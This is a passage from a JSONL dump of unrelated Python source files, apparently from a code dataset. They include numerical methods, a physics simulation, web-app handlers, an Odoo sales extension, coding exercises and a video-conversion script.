(yi*ys < 0):\n xm = xi - ((yi*(xs-xi))/(yi-ys))\n tXm.append(xm)\n ym = function.evalf().subs({x:xm}).evalf()\n tfXm.append(ym)\n error = tol + 1\n cont = 1\n tIter.append(cont)\n\n while((ym != 0) and (error > tol) and (cont < ite)):\n if yi*ym < 0:\n xs = xm\n ys = ym\n else:\n xi = xm\n yi = ym\n tXs.append(xs)\n tXi.append(xi)\n xaux = xm\n xm = xi - ((yi*(xs-xi))/(yi-ys))\n tXm.append(xm)\n ym = function.evalf().subs({x:xm}).evalf()\n tfXm.append(ym)\n error = math.fabs(xm - xaux)\n errorRela.append(error/xm)\n cont = cont + 1\n tIter.append(cont)\n \n if(ym == 0):\n print (str(xm) + \" is an aproximate root\")\n elif(error < tol):\n print (str(xaux) + \" is an aproximate root\")\n else:\n print (\"Failed!\")\n else:\n print (\"Failed the interval!\")\n else:\n print (str(xs) + \"is a root\")\n else:\n print (str(xi) + \" is a root\")\n else:\n print (\"Wrong iterates!\")\n else:\n print (\"Tolerance < 0\")\n table.add_column(\"n\",tIter)\n table.add_column(\"Xi\",tXi)\n table.add_column(\"Xs\",tXs)\n table.add_column(\"Xm\",tXm)\n table.add_column(\"f(Xm)\",tfXm)\n table.add_column(\"Error Relativo\",errorRela)\n print(table)\n \nif __name__ == \"__main__\":\n x = sympy.Symbol('x')\n symbols = {'e':math.e,'cos':sympy.cos,'sin':sympy.sin,'ln':sympy.ln}\n function = input(\"Enter the function : \")\n function = sympy.sympify(function,locals =symbols)\n xi = float(input(\"Enter the first point: \"))\n xs = float(input(\"Enter the last point: \"))\n tol = float(input(\"Enter the tolerance: \"))\n ite = int(input(\"Enter N iteraters: \"))\n table = PrettyTable()\n tIter = []\n tXi = []\n tXs = []\n tXm = []\n tfXm = []\n errorRela = []\n fakeRule(xi, xs, tol, ite)","sub_path":"OneVariable/FalsePositionMethod/falsePositionMethod.py","file_name":"falsePositionMethod.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220275771","text":"\nimport random\nimport webapp2\n\nfrom google.appengine.api import app_identity\nfrom google.appengine.api import images\nfrom google.appengine.api import mail\nfrom google.appengine.api import users\nfrom google.appengine.ext import blobstore\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import blobstore_handlers\n\nfrom models import Employee as Emp\nfrom models import Role\nfrom models import Project as Prj\nfrom querydefs import JinjaEnv\nfrom querydefs import QueryDefs\n\nDEFAULT_BUCKET = app_identity.get_default_gcs_bucket_name()\nDEFAULT_FOLDER = 'userpics'\n\nclass AdminAddUser(webapp2.RequestHandler):\n \"\"\"Handler for adding users.\"\"\"\n def get(self):\n \"\"\"Presents form for adding a user.\"\"\"\n employee = Emp.query(\n Emp.user_id == users.get_current_user().user_id()\n ).get()\n\n jinjaenv = JinjaEnv()\n template = jinjaenv.get_jinja_env().get_template(\n 'templates/admin/adduser.html'\n )\n bucket_name = '/gs/%s/%s' % (DEFAULT_BUCKET, DEFAULT_FOLDER)\n qd = QueryDefs()\n template_values = {\n 'employee': employee,\n 'projects': qd.get_all_project_nameid(),\n 'roles': qd.get_all_roles_nameid(),\n 'upload_url': blobstore.create_upload_url('/action/admin/adduser/', gs_bucket_name=app_identity.get_default_gcs_bucket_name()),\n 'is_admin': users.is_current_user_admin(),\n 'url_link': users.create_logout_url('/')\n }\n\n self.response.write(template.render(template_values))\n\n\nclass AdminUploadUser(blobstore_handlers.BlobstoreUploadHandler):\n def post(self):\n \"\"\"Add an Employee entity to the datastore.\"\"\"\n file_info = self.get_file_infos()[0]\n email = self.request.get('email')\n projects = []\n\n for project in self.request.get_all('prj_id'):\n projects.append(ndb.Key(Prj, int(project)))\n\n new_employee = Emp(\n employee_id=str(random.getrandbits(68)).zfill(21),\n first_name=self.request.get('first_name'),\n last_name=self.request.get('last_name'),\n email=email,\n phone=self.request.get('phone'),\n #photo=gs_object_name,\n photo=file_info.gs_object_name,\n role=ndb.Key(Role, int(self.request.get('role_id'))),\n rejected_num=0,\n projects=projects,\n )\n new_employee.put()\n\n # Notify new user of account creation\n \"\"\"\n sender_address = \"jmooretestdev@appspot.gserviceaccount.com\"\n user_address = email\n subject = \"Welcome to the Taos Timesheet Application\"\n body = \"Greetings \" + new_employee.first_name + \", and welcome to the new Taos Timesheet Application.\"\n mail.send_mail(sender_address, user_address, subject, body)\n \"\"\"\n self.redirect('/view/admin/users/')\n","sub_path":"handlers/adminadduser.py","file_name":"adminadduser.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"606506110","text":"\n\nfrom xai.brain.wordbase.nouns._shit import _SHIT\n\n#calss header\nclass _SHITTING(_SHIT, ):\n\tdef __init__(self,): \n\t\t_SHIT.__init__(self)\n\t\tself.name = \"SHITTING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"shit\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_shitting.py","file_name":"_shitting.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617767500","text":"import taichi as ti\nimport numpy as np\nimport random\nimport time\n\nreal = ti.f32\ndim = 2\nn_particles = 8192 * 4\nn_grid = 256\ndx = 1 / n_grid\ninv_dx = 1 / dx\ndt = 2.0e-4\np_vol = (dx * 0.5) ** 2\np_rho = 1\np_mass = p_vol * p_rho\nE = 100\n\nscalar = lambda: ti.var(dt=real)\nvec = lambda: ti.Vector(dim, dt=real)\nmat = lambda: ti.Matrix(dim, dim, dt=real)\n\nx, v = vec(), vec()\ngrid_v, grid_m = vec(), scalar()\nC, J = mat(), scalar()\n\n# ti.cfg.arch = ti.x86_64\nti.cfg.arch = ti.cuda\n# ti.cfg.verbose_kernel_launches = True\n# ti.cfg.default_gpu_block_dim = 32\n\n@ti.layout\ndef place():\n ti.root.dense(ti.k, n_particles).place(x, v, J, C)\n ti.root.dense(ti.ij, n_grid).place(grid_v, grid_m)\n\n\n@ti.kernel\ndef clear_grid():\n for i, j in grid_m:\n grid_v[i, j] = [0, 0]\n grid_m[i, j] = 0\n\n\n@ti.kernel\ndef p2g():\n for p in x:\n base = ti.cast(x[p] * inv_dx - 0.5, ti.i32)\n fx = x[p] * inv_dx - ti.cast(base, ti.f32)\n w = [0.5 * ti.sqr(1.5 - fx), 0.75 - ti.sqr(fx - 1),\n 0.5 * ti.sqr(fx - 0.5)]\n stress = -dt * p_vol * (J[p] - 1) * 4 * inv_dx * inv_dx * E\n affine = ti.Matrix([[stress, 0], [0, stress]]) + p_mass * C[p]\n for i in ti.static(range(3)):\n for j in ti.static(range(3)):\n offset = ti.Vector([i, j])\n dpos = (ti.cast(ti.Vector([i, j]), ti.f32) - fx) * dx\n weight = w[i](0) * w[j](1)\n grid_v[base + offset].atomic_add(weight * (p_mass * v[p] + affine @ dpos))\n grid_m[base + offset].atomic_add(weight * p_mass)\n\n\nbound = 3\n\n\n@ti.kernel\ndef grid_op():\n for i, j in grid_m:\n if grid_m[i, j] > 0:\n inv_m = 1 / grid_m[i, j]\n grid_v[i, j] = inv_m * grid_v[i, j]\n grid_v(1)[i, j] -= dt * 9.8\n if i < bound and grid_v(0)[i, j] < 0:\n grid_v(0)[i, j] = 0\n if i > n_grid - bound and grid_v(0)[i, j] > 0:\n grid_v(0)[i, j] = 0\n if j < bound and grid_v(1)[i, j] < 0:\n grid_v(1)[i, j] = 0\n if j > n_grid - bound and grid_v(1)[i, j] > 0:\n grid_v(1)[i, j] = 0\n\n\n@ti.kernel\ndef g2p():\n for p in x:\n base = ti.cast(x[p] * inv_dx - 0.5, ti.i32)\n fx = x[p] * inv_dx - ti.cast(base, ti.f32)\n w = [0.5 * ti.sqr(1.5 - fx), 0.75 - ti.sqr(fx - 1.0),\n 0.5 * ti.sqr(fx - 0.5)]\n new_v = ti.Vector([0.0, 0.0])\n new_C = ti.Matrix([[0.0, 0.0], [0.0, 0.0]])\n\n for i in ti.static(range(3)):\n for j in ti.static(range(3)):\n dpos = ti.cast(ti.Vector([i, j]), ti.f32) - fx\n g_v = grid_v[base(0) + i, base(1) + j]\n weight = w[i](0) * w[j](1)\n new_v += weight * g_v\n new_C += 4 * weight * ti.outer_product(g_v, dpos) * inv_dx\n\n v[p] = new_v\n x[p] += dt * v[p]\n J[p] *= 1 + dt * new_C.trace()\n C[p] = new_C\n\ngui = ti.core.GUI(\"MPM\", ti.veci(512, 512))\ncanvas = gui.get_canvas()\n\n@ti.kernel\ndef copy_x(pos: ti.ext_arr()):\n for i in range(n_particles):\n pos[i * 2] = x[i][0]\n pos[i * 2 + 1] = x[i][1]\n\ndef main():\n for i in range(n_particles):\n x[i] = [random.random() * 0.4 + 0.2, random.random() * 0.4 + 0.2]\n v[i] = [0, -1]\n J[i] = 1\n\n for f in range(200):\n canvas.clear(0x112F41)\n t = time.time()\n for s in range(150):\n clear_grid()\n p2g()\n grid_op()\n g2p()\n print('{:.1f} ms per frame'.format(1000 * (time.time() - t)))\n\n pos = np.empty((2 * n_particles), dtype=np.float32)\n copy_x(pos)\n for i in range(n_particles):\n # canvas.circle(ti.vec(x[i][0], x[i][1])).radius(1).color(0x068587).finish()\n \n # Python binding here is still a bit slow...\n canvas.circle(ti.vec(pos[i * 2], pos[i * 2 + 1])).radius(1).color(0x068587).finish()\n gui.update()\n ti.profiler_print()\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/mpm_fluid.py","file_name":"mpm_fluid.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"133349065","text":"from enum import Enum\n\n\nclass filterChoices(Enum):\n CONTAINS = 'contains'\n NOT_CONTAINS = 'notcontains'\n EQUAL = 'equal'\n NOT_EQUAL = 'notequal'\n GREATER_THAN = 'greater_than'\n GREATER_THAN_EQUAL_TO = 'greater_than_equal_to'\n LESS_THAN = 'less_than'\n LESS_THAN_EQUAL_TO = 'less_than_equal_to'\n BEGIN_WITH = 'begin_with'\n NOT_BEGIN_WITH = 'not_begin_with'\n END_WITH = 'end_with'\n NOT_END_WITH = 'not_end_with'\n EARLIEST = 'earliest'\n LATEST = 'latest'\n BETWEEN = 'between'\n NOT_BETWEEN = 'notbetween'\n\n def __str__(self):\n return self.value\n","sub_path":"pyplan/pyplan/common/classes/filterChoices.py","file_name":"filterChoices.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522606762","text":"import sys\nsys.stdin = open('inpu.txt', 'r')\n\ndef mag_st(i, j):\n global result\n if i < 99:\n if base[i][j] == 1 and base[i+1][j] == 2:\n result += 1\n return\ndef magnet_movement(i, j):\n global result\n dy = [1, -1]\n y = i\n if base[i][j] == 1:\n while (y + dy[0]) < 99:\n if base[y + dy[0]][j] == 0:\n # print(y)\n base[y][j] = 0\n # print('base',y + dy[0], j)\n base[y + dy[0]][j] = 1\n y += dy[0]\n else:\n break\n elif base[i][j] == 2:\n while base[y + dy[1]][j] == 0 and y + dy[1] > 0:\n base[y][j] = 0\n base[y + dy[1]][j] = 1\n y += dy[1]\n\ntestcase = 10\nfor tcnum in range(1, testcase + 1):\n stst = []\n result = 0\n base_len = int(input())\n base = [0] * 100\n for i in range(100):\n base[i] = list(map(int, input().split()))\n\n for i in range(100):\n for j in range(100):\n magnet_movement(i, j)\n for i in range(100):\n for j in range(100):\n mag_st(i, j)\n\n\n\n\n print('#{} {}'.format(tcnum, result))","sub_path":"algorithm_practice/1220_magnet.py","file_name":"1220_magnet.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"36579086","text":"\r\n## arrInt = [1, 34, 5, 6] ## Example 1\r\narrInt = [1, 24, 51, 60] ## Example 2\r\n\r\narrOutput = []\r\n\r\nfor nLoop in arrInt:\r\n arrOutput = arrOutput + [int(strElem) for strElem in str(nLoop)]\r\n\r\nprint (arrOutput)\r\n","sub_path":"challenge-230/eric-cheung/python/ch-1.py","file_name":"ch-1.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"214480091","text":"with open('input.txt') as f:\n input = [line.strip() for line in f]\n\ndef closest_intersection(wire1, wire2):\n intersections = set(wire1).intersection(set(wire2))\n return min(wire1[loc] + wire2[loc] for loc in intersections)\n\ndef coordinations(input):\n input = input.split(',')\n coord = {}\n x = y = num_steps = 0\n for point in input:\n direction = point[0]\n distance = int(point[1:])\n for _ in range(distance):\n num_steps += 1\n if direction == 'U':\n y += 1\n elif direction == 'D':\n y -= 1\n elif direction == 'R':\n x += 1\n elif direction == 'L':\n x -= 1\n else:\n raise RuntimeError(f\"bad direction: {direction}\")\n loc = (x,y)\n if loc not in coord:\n coord[loc] = num_steps\n return(coord)\n\nwire1 = coordinations(input[0])\nwire2 = coordinations(input[1])\nprint(closest_intersection(wire1, wire2))\n","sub_path":"day03/day3b.py","file_name":"day3b.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"22329934","text":"import numpy as np\nimport cv2\n\n# defining our own canvas with numpy arrays!\ncanvas = np.zeros((300, 300, 3), dtype=\"uint8\") # (0,0,0) is black\ncv2.imshow(\"Canvas\", canvas)\n\n'''drawing lines'''\ngreen = (0, 255, 0)\ncv2.line(canvas, (0, 0), (300, 300), green)\ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n\nred = (0, 0, 255)\ncv2.line(canvas, (300, 0), (0, 300), red, 3) # last one is thickness - 3 pixels\ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n\n'''drawing rectangles'''\ncv2.rectangle(canvas, (10,10), (60,60), green) # specify start and end of rect's diagonal \ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n\ncv2.rectangle(canvas, (50,10), (250,60), red, -7) # negative value to have a filled in rectangle\ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n\n'''drawing circles'''\ncanvas = np.zeros((300, 300, 3), dtype = \"uint8\") # refresh canvas\nwidth, height, channels = canvas.shape\ncenterX, centerY = width//2, height//2\n\n# cv2.circle(canvas, (centerX, centerY), 40, red)\n# cv2.imshow(\"Canvas\", canvas)\n# cv2.waitKey(0)\n\n# drawing a bullseye\nfor radius in range(20, 150, 30):\n cv2.circle(canvas, (centerX, centerY), radius, red)\ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n\n#abstract art! Drawing 25 random circles\ncanvas = np.zeros((300, 300, 3), dtype = \"uint8\") # refresh canvas\nfor _ in range(25) :\n radius = np.random.randint(0, high = 200)\n color = np.random.randint(0, high = 255, size = 3).tolist()\n center = tuple(np.random.randint(0, 300, size = 2).tolist())\n cv2.circle(canvas, center, radius, color, -1) # negative thickness to fill\ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n","sub_path":"3_drawing.py","file_name":"3_drawing.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358912992","text":"class Solution:\n # @param ratings, a list of integer\n # @return an integer\n def candy(self, ratings):\n ret = [1] * len(ratings)\n for i in range(1,len(ratings)):\n if ratings[i] > ratings[i-1]:\n ret[i] = ret[i-1] + 1\n ret2 = [1] * len(ratings)\n for i in range(len(ratings)-2,-1,-1):\n if ratings[i] > ratings[i+1]:\n ret2[i] = ret2[i+1] + 1\n return sum([max(ret[i],ret2[i]) for i in range(len(ratings))])","sub_path":"leetcode/candy.py","file_name":"candy.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"597508927","text":"class Node:\n def __init__(self,data,next,prev):\n self.data = data\n self.next = next\n self.prev = prev\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert_begining(self,data):\n if self.head == None :\n node = Node(data,self.head,self.head)\n self.head = node\n return\n node = Node(data,self.head,None)\n self.head.prev = node\n self.head = node\n return\n\n def print_forward(self):\n if self.head == None:\n print(\"No element\")\n return\n itr = self.head\n liststr = ''\n while itr:\n liststr += str(itr.data)+\"--->\"\n itr = itr.next\n\n print(liststr)\n\n def get_length(self):\n count = 0\n if self.head == None:\n return count\n itr = self.head\n while itr:\n itr = itr.next\n count += 1\n return count\n\n def print_backward(self):\n if self.head == None:\n print(\"No element\")\n return\n itr = self.head\n liststr = ''\n while itr.next:\n itr = itr.next\n while itr:\n liststr += str(itr.data)+\"--->\"\n itr = itr.prev\n print(liststr)\n\n def insert_elemnt(self,list):\n for listitem in list:\n self.insert_begining(listitem)\n\nif __name__ == \"__main__\":\n ll = LinkedList()\n ll.insert_elemnt([12,13,14,15,46])\n ll.print_backward()\n ll.print_forward()","sub_path":"DoubleLinkList.py","file_name":"DoubleLinkList.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271449830","text":"import matplotlib.pyplot as plt\nimport time\nimport jittens\nfrom . import vast, data\nimport pandas as pd\nfrom logging import getLogger\nfrom pavlov import runs, stats\nimport ast\n\nlog = getLogger(__name__)\n\ndef acknowledged(desc):\n fresh = [j.params for j in jittens.jobs.jobs('fresh').values()]\n active = [j.params for j in jittens.jobs.jobs('active').values()]\n\n rs = runs.pandas().loc[lambda df: df.description == desc]\n fetched = [ast.literal_eval(r['JITTENS_PARAMS']) for _, r in rs._env.iteritems()]\n\n return fresh + active + fetched\n\ndef keystr(d):\n return str({k: d[k] for k in ('boardsize', 'width', 'depth', 'timelimit')})\n\ndef is_missing(proposal, acks):\n return keystr(proposal) not in {keystr(a) for a in acks}\n\ndef launch():\n boardsize = 9\n limits = {3: 10, 5: 30, 7: 90, 9: 180}\n desc = f'main/{boardsize}'\n acks = acknowledged(desc)\n for width in [64, 128, 256, 512, 1024]:\n for depth in [1, 2, 4, 8, 16, 32]:\n params = dict(width=width, depth=depth, boardsize=boardsize, timelimit=limits[boardsize]*60, desc=desc)\n if is_missing(params, acks):\n log.info(f'Launching {params}')\n jittens.jobs.submit(\n cmd='python -c \"from boardlaw.main import *; run_jittens()\" >logs.txt 2>&1',\n dir='.',\n resources={'gpu': 1},\n params=params)\n\ndef fetch():\n return jittens.manage.fetch('output/pavlov/', 'output/pavlov/')\n\ndef refresh():\n vast.jittenate(local=True, ssh_accept=True)\n last_fetch = 0\n while not jittens.finished():\n try:\n display.clear_output(wait=True)\n jittens.refresh()\n time.sleep(15)\n\n if time.time() > last_fetch + 600:\n fetched = fetch()\n jittens.manage.cleanup(fetched)\n last_fetch = time.time()\n except Exception as e:\n log.info(f'Failed with error {e}')\n time.sleep(60)\n\n fetched = fetch()\n jittens.manage.cleanup(fetched)\n\ndef progress():\n active_jobs = jittens.jobs.jobs('active')\n active_runs = runs.pandas()._env.dropna().apply(lambda p: p.get('JITTENS_NAME', '') in active_jobs).pipe(lambda s: s.index[s])\n keys = runs.pandas().loc[active_runs, 'params'].apply(lambda p: (p['boardsize'], p['width'], p['depth']))\n return data.load_field('elo-mohex', 'μ').resample('1min').mean().bfill().notnull().sum().reindex(keys.values)\n\ndef offers():\n vast.offers('cuda_max_good >= 11.1 & gpu_name == \"RTX 2080 Ti\"')","sub_path":"grid/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"285702331","text":"'''\nComplete the following 3 searching problems using techniques\nfrom class and from Ch15 of the textbook website\n'''\nimport re\n\n# 1. (6pts) Write code which finds and prints the longest\n# word in the provided dictionary. If there are more\n# than one longest word, print them all.\nlength = []\ndictionary = []\n\n\ndef split_line(line):\n return re.findall('[A-Za-z]+(?:\\'[A-Za-z]+)?', line)\n\n\nfile = open(\"../Searching/dictionary.txt\")\n\nfor line in file:\n line = line.strip()\n words = split_line(line)\n for word in words:\n dictionary.append(word)\n length.append([len(word), word])\n\nlength.sort()\nprint(length[len(length) - 1])\n\n# 2. (8pts) Write code which finds\n# The total word count AND average word length\n# in \"AliceInWonderLand.txt\"\nword_length = 0\naliceinwonderland = []\nfile = open(\"../Searching/AliceInWonderLand.txt\")\n\nfor line in file:\n line = line.strip()\n words = split_line(line)\n for word in words:\n aliceinwonderland.append(word)\n word_length += len(word)\n\nprint(len(aliceinwonderland))\nprint(word_length / len(aliceinwonderland))\n\n# CHOOSE ONE OF THE FOLLOWING TWO PROBLEMS\n\n# 3 (12pts) How many times does \"Cheshire\" occur in\"AliceInWonderLand.txt\"?\n# How many times does \"Cat\" occur?\n# How many times does \"Cheshire\" immediately followed by \"Cat\" occur?\nfollow = 0\n\n\ndef find(aliceinwonderland, word):\n for i, ltr in enumerate(aliceinwonderland):\n if ltr == word:\n yield i\n\n\nrepeat = list(find(aliceinwonderland, \"Cheshire\"))\nrepeatc = list(find(aliceinwonderland, \"Cat\"))\nprint(len(repeat))\nprint(len(list(find(aliceinwonderland, \"Cat\"))))\nprint(repeat)\nprint(repeatc)\nfor i in range(len(repeat)):\n if (repeat[i] + 1) in repeatc:\n follow += 1\n\nprint(follow)\n#### OR #####\n\n# 3 (12pts)Find the most frequently occurring\n# seven letter word in \"AliceInWonderLand.txt\"\n\n# Challenge problem (for fun). What words appear in the text of \"Alice in Wonderland\" that DO NOT occur in \"Alice Through the Looking Glass\". Make a list. You can substitute this for any of the above problems.\n","sub_path":"Homework/Searching/search_problems.py","file_name":"search_problems.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"425026945","text":"from django_backend.settings import EMAIL_HOST_USER\nfrom django.core.mail import send_mail\nimport csv\nimport io\n\nfrom ..models import Respondent, SurveyResponse\n\ndef import_respondents(excel_file, eseaaccount, survey):\n decoded_file = excel_file.read().decode('utf-8')\n io_string = io.StringIO(decoded_file)\n\n colsdict = {}\n respondents = []\n requiredattributes = {'email', 'first_name', 'last_name', 'last_name_prefix'}\n\n for i, row in enumerate(csv.reader(io_string, delimiter=',', quotechar='|')):\n if (i == 0):\n row = [x.lower() for x in row]\n print(row)\n missingattributes = requiredattributes.difference(set(row))\n \n if missingattributes:\n return \"Your csv file is missing the following attribute columns: \" + \", \".join(missingattributes)\n for j, column in enumerate(row):\n colsdict[column] = j\n else:\n try:\n email =row[colsdict['email']]\n firstname = row[colsdict['first_name']]\n lastnameprefix = row[colsdict['last_name_prefix']]\n lastname = row[colsdict['last_name']]\n respondent = Respondent(organisation=eseaaccount.organisation, email=email, first_name=firstname, last_name_prefix=lastnameprefix, last_name=lastname)\n print(respondent)\n respondents.append(respondent)\n except:\n return f\"error in row {i}: {row}\"\n for respondent in respondents:\n respondent.save()\n new_survey_response = SurveyResponse.objects.create(survey=survey, respondent=respondent, esea_account=eseaaccount)\n print(f'{respondent}: {new_survey_response.token}')\n subject = f\"Survey for {respondent} regarding {respondent.organisation}\"\n message = f\"Hi {respondent}!\\nWe would like you to take a moment to fill in the following survey as employee of {respondent.organisation} to create a report about the organisation's position in the ethical, social and environmental fields.\\n\\n https://esea.herokuapp.com/survey-fill/{new_survey_response.token}/\" # http://localhost:8080/\n # recepient = respondent.email\n recepient = \"seriousdeejay@gmail.com\"\n send_mail(subject, message, EMAIL_HOST_USER, [recepient], fail_silently = False)\n break\n return \"The Survey has been succesfully deployed to the provided survey respondents.\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''\n eseaaccount = get_object_or_404(EseaAccount, pk=eseaaccount_pk)\n colsdict = {}\n requiredattributes = {'email', 'first_name', 'last_name', 'last_name_prefix'}\n respondents = []\n\n with open(os.path.join(os.getcwd(), \"core\\\\uploadedfiles\\\\uploadedemployees.csv\")) as file:\n #maybe quotechar should be , ?\n for i, row in enumerate(newemployees):\n if (i == 0):\n missingattributes = requiredattributes.difference(set(row))\n if missingattributes:\n responsestring = \"Your csv file is missing the following attribute columns: \" + \", \".join(missingattributes)\n return Response({responsestring})\n for j, column in enumerate(row):\n colsdict[column] = j\n\n else:\n try:\n print(eseaaccount.organisation)\n email = row[colsdict['email']]\n firstname = row[colsdict['first_name']]\n lastnameprefix = row[colsdict['last_name_prefix']]\n lastname = row[colsdict['last_name']]\n print('ch')\n respondent = Respondent(organisation=eseaaccount.organisation, email=email, first_name=firstname, last_name_prefix=lastnameprefix, last_name=lastname)\n print(i, '--------', respondent)\n respondents.append(respondent)\n except:\n return Response({f\"error in row {i}\"})\n\n for respondent in respondents:\n respondent.save()\n new_survey_response = SurveyResponse.objects.create(survey=1, respondent=respondent, esea_account=eseaaccount)\n subject = f\"Survey for {respondent} regarding {respondent.organisation}\"\n message = f\"Hi {respondent}!\\nWe would like you to take a moment to fill in the following survey as employee of {respondent.organisation} to create a report about the organisation's position in the ethical, social and environmental fields.\\n\\nhttp://localhost:8080/{new_survey_response.token}/\"\n #recepient = respondent.email\n recepient = \"seriousdeejay@gmail.com\"\n # send_mail(subject, message, EMAIL_HOST_USER, [recepient], fail_silently = False)\n return Response({\"The Survey has been succesfully deployed to the provided survey respondents.\"})\n '''","sub_path":"core/utils/import_respondents.py","file_name":"import_respondents.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61770942","text":"'''\n 7 Kyu Convert Color image to greyscale\n p = [R,G,B] => [(R+G+B)/3, (R+G+B)/3, (R+G+B)/3]\n\n'''\nfrom numpy import average\n\ndef color_2_grey(colors):\n return [\n [\n [round(average(subsubarr))]*3 for subsubarr in subarr\n ]\n for subarr in colors]\n\nmatrix =[ [ [123, 231, 12], [56, 43, 124] ],\n [ [78, 152, 76], [64, 132, 200] ]]\nprint(color_2_grey(matrix))","sub_path":"python/color_2_grey.py","file_name":"color_2_grey.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346965835","text":"import logging \nfrom odoo import fields, http, tools, _\nfrom odoo.http import request\n_logger = logging.getLogger(__name__)\nfrom odoo import api, fields ,models\nfrom odoo.exceptions import ValidationError \nfrom odoo.http import request\nfrom collections import OrderedDict\nfrom datetime import datetime\n\nclass sales_order(models.Model):\n _inherit=\"sale.order\"\n tax_id=fields.Many2one(\"account.tax\",string=\"Taxes\")\n survey_sheet=fields.Many2one(\"survey.sheet\",String=\"Survey Sheet\")\n installation=fields.Float(\"Installation %\")\n offer_num=fields.Float(\"Offer Number\",default=1)\n offer_duration=fields.Selection([(\"week\",\"Week\"),(\"month\",\"Month\"),(\"year\",\"Year\")],String=\"Duration\",default=\"week\")\n install_value=fields.Float(compute='get_installion',string=\"Installation %\")\n @api.onchange(\"tax_id\",\"order_line\")\n def get_taxes(self):\n if self.tax_id:\n for rec in self.order_line:\n rec.tax_id=self.tax_id\n \n @api.depends(\"order_line\",\"installation\")\n def get_installion(self):\n if self.installation and self.order_line:\n total_price=0\n for rec in self.order_line:\n if rec.product_id.installation ==False:\n total_price+=rec.price_unit*rec.product_uom_qty\n \n self.install_value=total_price*(self.installation/100)\n \n else:\n self.install_value=0\n @api.constrains(\"installation\")\n def get_install_product(self):\n _logger.info(\"PPPPPPPPPPPPP\")\n _logger.info(self.install_value)\n if self.installation:\n products=self.env['product.product'].search([('installation','=',True)])\n product_id=0\n for prod in products:\n product_id=prod.id\n break\n order_lines=self.env['sale.order.line'].search([(\"product_id\",\"=\",product_id),(\"order_id\",\"=\",self.id)])\n if product_id!=0:\n if order_lines:\n order_lines.write({\"price_unit\":self.install_value})\n else:\n self.order_line.create({\"product_id\":product_id,\"name\":prod.name,\"price_unit\":self.install_value,\"order_id\":self.id})\n \n\n\n","sub_path":"hdl-addons/installion_at_so/models/sales_order.py","file_name":"sales_order.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"216196881","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport commands\nimport fnmatch\nimport json\nimport time\nimport shutil\n\nhandbrake = '/usr/bin/HandBrakeCLI'\nffprobe = '/usr/bin/ffprobe'\nffprobe_switches = '-show_format -show_streams -loglevel quiet -print_format json'\npath_to_videos = '/path/to/your/files'\nbase_tv_path = os.path.join(os.path.join(path_to_videos))\n\nclass Converter(object):\n def __init__(self):\n self.classname=\"Converter\"\n\n def getlistofshows(self):\n tmplist = []\n for root, dirs, files in os.walk(base_tv_path):\n for file in files:\n tmplist.append(os.path.join(root, file))\n return tmplist\n\n def convertfile(self, pathtofile):\n outputfile = (\"%s.mp4\" % pathtofile[:-4]) \n convert_command = \"%s -i \\\"%s\\\" --preset=\\\"Normal\\\" -o \\\"%s\\\"\" % (handbrake, pathtofile, outputfile)\n output = commands.getoutput(convert_command)\n os.remove(os.path.join(pathtofile))\n return output\n\n def check_convert_need(self, pathtofile):\n ffprobecommand = \"%s %s \\\"%s\\\"\" % (ffprobe, ffprobe_switches, pathtofile)\n dataresults = str(commands.getoutput(ffprobecommand))\n json_version = json.loads(dataresults)\n video_codec = json_version['streams'][0]['codec_name']\n audio_codec = json_version['streams'][1]['codec_name']\n if video_codec != \"h264\" or audio_codec != \"aac\":\n print(\" - [%s | %s] converting %s\" % 